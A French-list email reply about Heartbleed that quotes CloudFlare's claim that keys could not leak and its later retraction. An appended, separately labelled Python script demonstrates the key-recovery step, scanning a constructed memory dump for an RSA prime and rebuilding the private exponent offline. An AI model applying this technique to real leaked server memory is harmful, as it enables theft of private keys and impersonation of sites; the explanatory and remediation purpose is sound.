
Re: Fwd: [HS] OpenSSL "Heartbleed" flaw



On 2014-04-12 10:51:57 +0200, Philippe Gras wrote:
> It looks like the OpenSSL problem is also having repercussions on
> business…
> 
> Begin forwarded message:
> 
> >From: CloudFlare Team <updates@cloudflare.com>
> >Date: 12 April 2014 07:12:08 CEST
> >To: <ph.gras@worldonline.fr>
> >Objet : Your website is secure from the OpenSSL Heartbleed vulnerability
> >Reply-To: <bounces-to@cloudflare.com>
[...]
> >PRIVATE KEY DATA. Our security and cryptographic team has been testing the
> >possibility that private SSL key data may have been retrieved. We have
> >been unable to replicate a situation where private SSL key data would
> >leak. We have set up a challenge to see if others can exploit the bug. See
> >more information on our blog:
> >
> >http://blog.cloudflare.com/answering-the-critical-question-can-you-get-private-ssl-keys-using-heartbleed
[...]

But since then:

"Update:
Below is what we thought as of 12:27pm UTC. To verify our belief we
crowd sourced the investigation. It turns out we were wrong. While
it takes effort, it is possible to extract private SSL keys. The
challenge was solved by Software Engineer Fedor Indutny and Ilkka
Mattila at NCSC-FI roughly 9 hours after the challenge was first
published. Fedor sent 2.5 million requests over the course of the day
and Ilkka sent around 100K requests. Our recommendation based on this
finding is that everyone reissue and revoke their private keys.
CloudFlare has accelerated this effort on behalf of the customers
whose SSL keys we manage."

-- 
Vincent Lefèvre <vincent@vinc17.net> - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
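Added example, not part of the thread above and not CloudFlare's or the challenge solvers' code: the update says that, with enough heartbeat requests, a private key can be pulled out of the leaked memory. The script below shows the check that turns a pile of leaked bytes into a key. Each Heartbleed response can return up to 64 KiB of process memory; with only the server's public modulus N in hand, every byte window of prime length is read as an integer and tested for whether it divides N. A hit is one of the two RSA primes, and from that the private exponent follows directly. Everything here is constructed and labelled as such: a toy 512-bit key generated in pure Python, a fake "leak" buffer of random bytes with the prime embedded little-endian at a chosen offset (the limb layout assumed for an OpenSSL BIGNUM on an x86 host), and the offset 12345 itself. No network traffic is involved; it runs offline.

```python
"""Added example (not from the mailing-list thread): scan a Heartbleed-style
memory leak for an RSA prime by testing byte windows against the public
modulus N, then rebuild the private exponent. The leak is a constructed
buffer, the key a small demo key; nothing here touches a real server."""
import math
import random


def is_probable_prime(n, rng, rounds=24):
    """Miller-Rabin probable-prime test (adequate for a demo key)."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits, rng):
    """Random odd candidate with the top bit set, so p is exactly `bits` long."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand, rng):
            return cand


def make_key(bits, rng, e=65537):
    """Toy RSA keypair; 512 bits keeps the example fast (assumption: demo only)."""
    while True:
        p, q = gen_prime(bits // 2, rng), gen_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi), p, q


def build_leaked_chunk(p, rng, size=65536, offset=12345):
    """Constructed stand-in for one 64 KiB heartbeat response: random heap
    noise with the limbs of p embedded little-endian, the layout assumed here
    for an OpenSSL BIGNUM on an x86 host. The offset is arbitrary."""
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    p_bytes = p.to_bytes((p.bit_length() + 7) // 8, "little")
    buf[offset:offset + len(p_bytes)] = p_bytes
    return bytes(buf)


def find_prime_factor(chunk, n, prime_len):
    """Slide a prime_len-byte window over the leak; a window that divides n
    non-trivially is p or q. Both byte orders are tried because the attacker
    does not know the host's limb layout. Returns (offset, byteorder, factor)
    or None when the chunk holds no factor (then you send more heartbeats)."""
    for off in range(len(chunk) - prime_len + 1):
        window = chunk[off:off + prime_len]
        for order in ("little", "big"):
            x = int.from_bytes(window, order)
            if 1 < x < n and n % x == 0:
                return off, order, x
    return None


def rebuild_private_key(n, e, p):
    """With one factor known, the other is n // p and d follows from phi(n)."""
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1)), q


def key_works(n, e, d, m=42):
    """RSA round trip; True only if d is the private exponent for (n, e)."""
    return pow(pow(m, e, n), d, n) == m


if __name__ == "__main__":
    rng = random.Random(2014)          # fixed seed: reproducible demo key
    n, e, d, p, q = make_key(512, rng)
    leak = build_leaked_chunk(p, rng)
    hit = find_prime_factor(leak, n, prime_len=32)
    if hit is None:
        print("no factor in this chunk; keep collecting heartbeat responses")
    else:
        off, order, factor = hit
        d_rec, _ = rebuild_private_key(n, e, factor)
        print(f"factor at offset {off} ({order}-endian); "
              f"private key recovered: {key_works(n, e, d_rec)}")
```

The scan is cheap (one modular reduction per window), which is why the attack is a matter of volume rather than cleverness: the hard part is that any one response rarely contains key material, so the attacker keeps sending heartbeats until a chunk does. That is also why the only sound remediation after patching is the one the update recommends, revoking and reissuing the key, since the server cannot tell whether a prime was ever in a leaked chunk.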

